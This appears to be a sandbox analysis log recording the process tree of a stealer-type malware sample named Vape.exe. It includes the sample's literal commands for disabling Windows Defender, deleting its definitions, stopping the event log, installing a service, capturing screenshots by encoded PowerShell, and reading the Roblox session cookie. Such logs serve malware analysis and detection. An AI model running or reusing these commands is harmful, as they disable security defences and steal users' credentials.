C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Vape.exe"C:\Users\Admin\AppData\Local\Temp\Vape.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Webdriversession\gI2DkJwTD.vbe"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Webdriversession\SoPkc.bat" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Webdriversession\Intoref.exe"C:\Webdriversession\Intoref.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Webdriversession\msedge.exe"C:\Webdriversession\msedge.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "QHRAJGDI"4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "QHRAJGDI"4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m3wewmkx\m3wewmkx.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10F3.tmp" "c:\Users\Admin\AppData\Local\Temp\m3wewmkx\CSC7F12B3BB14F747BC9A4D908E8B4E61AF.TMP"8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48326⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\getmac.exegetmac6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1344"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 13446⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 732"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 7326⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4048"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40486⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2448"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24486⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
